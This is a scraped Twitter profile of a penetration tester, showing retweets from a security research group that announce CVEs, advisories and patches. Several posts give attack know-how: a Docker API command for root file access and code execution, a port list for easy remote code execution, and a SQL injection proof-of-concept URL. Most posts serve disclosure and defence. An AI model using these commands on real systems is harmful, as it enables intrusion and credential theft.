Alexandr Shvetsov (@shvetsovalex007)'s Twitter Profile
Alexandr Shvetsov

@shvetsovalex007

Penetration Tester at @ptsecurity

ID: 767397969171718145

21-08-2016 16:28:28

41 Tweet

187 Followers

63 Following

PT SWARM (@ptswarm):

New attack! Our researcher Arseniy Sharoglazov has discovered a method to connect to LDAP via #MSExchange from the Internet and access the whole Active Directory database. Read the research: swarm.ptsecurity.com/attacking-ms-e…

PT SWARM (@ptswarm):

OpenFire allows to get Arbitrary File Read and Unauthenticated Full Read SSRF via its 9090/http and 9091/https ports. The details are in the article by Alexandr Shvetsov (CVE-2019-18393 & CVE-2019-18394): swarm.ptsecurity.com/openfire-admin…

PT SWARM (@ptswarm):

The advisory for an Unauthenticated Arbitrary File Read vulnerability in Citrix XenMobile (CVE-2020-8209) found by our researcher Andrey Medov is now out! The fixes were released privately 3 weeks ago, so we hope a lot of companies are protected now 🙂 support.citrix.com/article/CTX277…

PT SWARM (@ptswarm):

We are releasing an article about an Authenticated Arbitrary File Read vulnerability (CVE-2019-19499) in Grafana! Dive into Go SQL client libraries, quirks of the MySQL protocol, and more! swarm.ptsecurity.com/grafana-6-4-3-…

PT SWARM (@ptswarm):

The advisory for an authenticated Java Deserialization vulnerability in IBM Maximo (CVE-2020-4521), found by our researchers Andrey Medov & Arseniy Sharoglazov, is now out!

ibm.com/support/pages/…

PT SWARM (@ptswarm):

Checkpoint patched a vulnerability in a Gaia OS component (CVE-2020-6020) discovered by our researchers Mikhail Klyuchnikov & Nikita Abramov. Argument Injection led to Arbitrary File Reading with root privileges and DoS.

supportcenter.checkpoint.com/supportcenter/…

PT SWARM (@ptswarm):

💥Easy RCE Ports

Java RMI: 1090,1098,1099,4444,11099,47001,47002,10999
WebLogic: 7000-7004,8000-8003,9000-9003,9503,7070,7071
JDWP: 45000,45001
JMX: 8686,9012,50500
GlassFish: 4848
jBoss: 11111,4444,4445
Cisco Smart Install: 4786
HP Data Protector: 5555,5556

#ptswarmTechniques

PT SWARM (@ptswarm):

11 SonicWall CVE-s
460.000 hosts by shodan
1 researcher - Nikita Abramov

Stack Overflow, Heap Overflow, Memory Leak and more!

CVE-2020-5133,34,...,43
CVSS: 9.4 to 5.3

Update your systems!

👉psirt.global.sonicwall.com/vuln-list

PT SWARM (@ptswarm):

💉Advanced MSSQL Injection Tricks💉 🩸 New DNS Out-Of-Band vector in SELECT statement 🩸 Quick exploitation: Get all table data in one query 🩸 Read local files in SELECT statement and more! Read the article: swarm.ptsecurity.com/advanced-mssql…

PT SWARM (@ptswarm):

Checkpoint ICA Management Tool (CVE-2020-6020) research by Mikhail Klyuchnikov & Nikita Abramov.

1⃣Send /etc/shadow to yourself via SMTP
2⃣Simple DoS

swarm.ptsecurity.com/vulnerabilitie…

PT SWARM (@ptswarm):

💥Easy RCE using Docker API on port 2375/tcp

docker -H <host>:2375 run --rm -it --privileged --net=host -v /:/mnt alpine

File Access: cat /mnt/etc/shadow
RCE: chroot /mnt

#ptswarmTechniques

PT SWARM (@ptswarm):

VMware fixed a Post-Auth RCE in vSphere Replication (CVE-2021-21976) found by our researcher Egor Dimitrenko.

Advisory: vmware.com/security/advis…

PT SWARM (@ptswarm):

SonicWall fixed a Post-Auth RCE (CVE-2021-20026) in Network Security Manager and an Unauth Buffer Overflow (CVE-2021-20027) in SonicOS found by our researcher Nikita Abramov.

Advisory: psirt.global.sonicwall.com/vuln-detail/SN…

PT SWARM (@ptswarm):

🐞PoC for a boolean-based #SQLi in Rapid7 Nexpose <= 6.6.48 (CVE-2020-7383)

https://nexpose.local:3780/data/discoveryAsset/config/folderPath?path=[sqli]

PT SWARM (@ptswarm):

🚨RCE on a backend IIS server via file upload with an atypical file extension.

📋More community curated payloads can be found at github.com/swisskyrepo/Pa…

#tipstoknow

PT SWARM (@ptswarm):

New article: "Cisco Hyperflex: How We Got RCE Through Login Form and Other Findings"

Read more about critical vulnerabilities (CVSS 9.8, 7.3 and 5.3) found by our researchers markmark & @__mn1__ :

swarm.ptsecurity.com/cisco-hyperfle…

PT SWARM (@ptswarm):

🔥 We have reproduced the fresh CVE-2021-41773 Path Traversal vulnerability in Apache 2.4.49.

If files outside of the document root are not protected by "require all denied" these requests can succeed.

Patch ASAP!

httpd.apache.org/security/vulne…